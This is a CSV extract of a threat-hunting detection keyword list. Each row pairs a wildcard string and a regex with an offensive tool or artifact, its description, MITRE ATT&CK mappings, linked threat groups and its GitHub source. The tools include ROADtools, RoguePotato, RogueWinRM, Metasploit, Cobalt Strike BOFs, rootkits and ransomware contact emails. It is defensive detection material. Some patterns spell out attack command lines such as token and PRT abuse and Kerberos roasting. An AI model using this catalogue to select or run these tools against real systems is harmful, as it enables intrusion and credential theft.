"*roadtx keepassauth -*",".{0,1000}roadtx\skeepassauth\s\-.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57414"
"*roadtx prt -u *--key-pem *",".{0,1000}roadtx\sprt\s\-u\s.{0,1000}\-\-key\-pem\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57415"
"*roadtx prtauth -*",".{0,1000}roadtx\sprtauth\s\-.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57416"
"*roadtx refreshtokento -*",".{0,1000}roadtx\srefreshtokento\s\-.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","57417"
"*Roast a specific specific SPN*",".{0,1000}Roast\sa\sspecific\sspecific\sSPN.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","57418"
"*'Roasted SPN *",".{0,1000}\'Roasted\sSPN\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","57419"
"*roastinthemiddle -i * -t * -u *.txt -g *",".{0,1000}roastinthemiddle\s\-i\s.{0,1000}\s\-t\s.{0,1000}\s\-u\s.{0,1000}\.txt\s\-g\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57420"
"*robertatravels@mail.com*",".{0,1000}robertatravels\@mail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57422"
"*robertdavidgraham/masscan*",".{0,1000}robertdavidgraham\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","57423"
"*RobustPentestMacro*",".{0,1000}RobustPentestMacro.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","57425"
"*RocksDefaultRequestRocksDefaultRequestRocksDefaultRequestRocks*",".{0,1000}RocksDefaultRequestRocksDefaultRequestRocksDefaultRequestRocks.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","57427"
"*rockyou.txt.gz*",".{0,1000}rockyou\.txt\.gz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","57428"
"*rockyou.txt.gz*",".{0,1000}rockyou\.txt\.gz.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57429"
"*rockyou-30000.*",".{0,1000}rockyou\-30000\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57430"
"*rofl0r/proxychains*",".{0,1000}rofl0r\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","57431"
"*RogueOxidResolver can be run locally on 127.0.0.1*",".{0,1000}RogueOxidResolver\scan\sbe\srun\slocally\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","57432"
"*RogueOxidResolver.cpp*",".{0,1000}RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","57433"
"*RoguePotato.cpp*",".{0,1000}RoguePotato\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","57434"
"*RoguePotato.exe*",".{0,1000}RoguePotato\.exe.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","57435"
"*RoguePotato.sln*",".{0,1000}RoguePotato\.sln.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","57436"
"*RoguePotato.zip*",".{0,1000}RoguePotato\.zip.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","57437"
"*RoguePotato-master*",".{0,1000}RoguePotato\-master.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","57438"
"*RogueSploit*",".{0,1000}RogueSploit.{0,1000}","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/h0nus/RogueSploit","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","57439"
"*RogueWinRM *",".{0,1000}RogueWinRM\s.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","57440"
"*RogueWinRM dll.*",".{0,1000}RogueWinRM\sdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57441"
"*RogueWinRM exe.*",".{0,1000}RogueWinRM\sexe\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57442"
"*RogueWinRM.c*",".{0,1000}RogueWinRM\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57443"
"*RogueWinRM.cpp*",".{0,1000}RogueWinRM\.cpp.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","57444"
"*RogueWinRM.exe*",".{0,1000}RogueWinRM\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","57445"
"*RogueWinRM.zip*",".{0,1000}RogueWinRM\.zip.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","57446"
"*Rolix44/Kubestroyer*",".{0,1000}Rolix44\/Kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","57447"
"*Romain Bentz (pixis - @hackanddo)*",".{0,1000}Romain\sBentz\s\(pixis\s\-\s\@hackanddo\).{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","57448"
"*Ronedx765in Walledx765et*",".{0,1000}Ronedx765in\sWalledx765et.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","57449"
"*roodkcaBdrauGifE*",".{0,1000}roodkcaBdrauGifE.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","57450"
"*rook@onionmail.org*",".{0,1000}rook\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57451"
"*rookuu/BOFs/*",".{0,1000}rookuu\/BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","1","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","57452"
"*Root backdoor obtained!*",".{0,1000}Root\sbackdoor\sobtained!.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","#content #linux","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z","57453"
"*root cargo new --bin legba*",".{0,1000}root\scargo\snew\s\-\-bin\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","57454"
"*root@P0wnedHost*",".{0,1000}root\@P0wnedHost.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","57456"
"*root\cimv2:Win32_Implant*",".{0,1000}root\\cimv2\:Win32_Implant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","57457"
"*root_userpass.txt*",".{0,1000}root_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57458"
"*rootcathacking/catspin*",".{0,1000}rootcathacking\/catspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","57459"
"*rootclay/WMIHACKER*",".{0,1000}rootclay\/WMIHACKER.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","1","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","57461"
"*Rootkit is already installed*",".{0,1000}Rootkit\sis\salready\sinstalled.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","57462"
"*Rootkit.cpp*",".{0,1000}Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","57463"
"*rootkiter.com/EarthWorm*",".{0,1000}rootkiter\.com\/EarthWorm.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","57465"
"*rootkiter.com/Termite*",".{0,1000}rootkiter\.com\/Termite.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","57466"
"*rootkiter/Termite*",".{0,1000}rootkiter\/Termite.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","57467"
"*rootkiter@rootkiter.com*",".{0,1000}rootkiter\@rootkiter\.com.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#email","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","57468"
"*rootkiter@sectree.cn*",".{0,1000}rootkiter\@sectree\.cn.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","57469"
"*root-shellcode-linux*",".{0,1000}root\-shellcode\-linux.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57470"
"*rop.find_gadgets*",".{0,1000}rop\.find_gadgets.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","57471"
"*RopChain.py*",".{0,1000}RopChain\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","57472"
"*ROPEngine.cpp*",".{0,1000}ROPEngine\.cpp.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","57473"
